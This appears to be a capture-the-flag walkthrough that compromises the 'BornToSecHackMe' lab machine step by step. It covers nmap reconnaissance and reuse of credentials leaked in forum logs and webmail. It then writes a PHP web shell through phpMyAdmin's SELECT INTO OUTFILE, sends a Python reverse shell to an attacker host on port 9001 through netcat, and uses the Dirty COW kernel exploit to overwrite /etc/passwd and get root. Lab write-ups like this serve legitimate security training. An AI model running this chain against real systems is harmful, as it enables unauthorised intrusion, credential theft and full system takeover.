> nmap 192.168.1.0/24
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.011s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
993/tcp open  imaps

> nmap -p- 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 14:30 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.019s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
993/tcp open  imaps

> nmap -sC 192.168.1.96
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 14:59 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.0089s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp  open  ssh
| ssh-hostkey:
|   1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
|   2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_  256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp  open  http
|_http-title: Hack me if you can
143/tcp open  imap
|_imap-capabilities: LOGINDISABLEDA0001 ENABLE have IMAP4rev1 STARTTLS listed post-login capabilities more OK IDLE ID Pre-login SASL-IR LITERAL+ LOGIN-REFERRALS
|_ssl-date: 2023-01-23T13:59:27+00:00; +1s from scanner time.
443/tcp open  https
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=BornToSec
| Not valid before: 2015-10-08T00:19:46
|_Not valid after:  2025-10-05T00:19:46
|_ssl-date: 2023-01-23T13:59:24+00:00; 0s from scanner time.
993/tcp open  imaps
|_ssl-date: 2023-01-23T13:59:24+00:00; +1s from scanner time.


> nmap 192.168.1.96 --script=http-enum
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-23 15:03 CET
Nmap scan report for BornToSecHackMe.wind3.hub (192.168.1.96)
Host is up (0.0039s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
143/tcp open  imap
443/tcp open  https
| http-enum:
|   /forum/: Forum
|   /phpmyadmin/: phpMyAdmin
|   /webmail/src/login.php: squirrelmail version 1.4.22
|_  /webmail/images/sm_logo.png: SquirrelMail
993/tcp open  imaps

open the web browser and try to go to https://192.168.1.96/forum/

we see "Probleme login ?"

after searching we notice this line:
Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2

it seems that a password is used as a user

we search up in the rest of the page and we found that the post is posted by Imezard

we try to log in the forum with that password and Success!!

Now we can see the profile where we find a mail: laurie@borntosec.net

And at the bottom we ca read powered by "my little forum"

we can try to connect to https://192.168.1.96/webmail/ with the same password

there we find a mail named "DB Access"

we find these credentials root/Fg-'kKXBj87E:aJ$ witch we can use to log into the phpmyadmin

now we need to inject SQL, with this https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/ we have an idea where to start

modifyng the command to a linux reverse shell we arrive at:
SELECT "<? system($_GET['cmd']); ?>" into outfile "/var/www/forum/backdoor.php"
but it doesn't work cause permissions.

but if we remember about the forum, we can search about some vulnerabilities and we find at https://github.com/ilosuna/mylittleforum that: "Depending on your server configuration the write permissions of the subdirectory templates_c (CHMOD 770, 775 or 777) and the file config/db_settings.php (CHMOD 666) might need to be changed in order that they are writable by the script"

so we can use:
SELECT "<? system($_GET['cmd']); ?>" into outfile "/var/www/forum/templates_c/backdoor.php"

Now if we use "https://192.168.1.96/forum/templates_c/backdoor.php?cmd=" we have a reverse shell!!

for a better shell we can inject a real reverse shell like as suggested from https://www.revshells.com/
we can see with 'ls /usr/bin' that python is installed, so with:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.242",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

with https://www.url-encode-decode.com/ we convert it to:

python+-c+%27import+socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.137.242%22%2C9001%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport+pty%3B+pty.spawn%28%22bash%22%29%27

now we attach it at the backdoor:

https://192.168.1.96/forum/templates_c/backdoor.php?cmd=python+-c+%27import+socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.137.242%22%2C9001%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport+pty%3B+pty.spawn%28%22bash%22%29%27


but before entering we must start up netcat:
nc -kl 9001

and we get the access!!:
www-data@BornToSecHackMe:/var/www/forum/templates_c$

with "whoami" we can see that we are: www-data

we can try to use "uname -a" and obtain:
Linux BornToSecHackMe 3.2.0-91-generic-pae #129-Ubuntu SMP Wed Sep 9 11:27:47 UTC 2015 i686 i686 i386 GNU/Linux

we can find online some cve about linux 3.2, but one of the most famous is "dirty cow"

we can find aome at:
https://dirtycow.ninja/
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

we can use the "dirty.c" exploit in this case so:

> cd /tmp

> cat > dirty.c << EOF
{PASTE THE CODE}
EOF

> gcc dirty.c -o dirty -pthread -lcrypt

> ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: pass

Complete line:
root:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash

mmap: b7fda000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'root' and the password 'pass'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'root' and the password 'pass'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

> su root
Password: pass

> whoami
root

> id
uid=0(root) gid=0(root) groups=0(root)

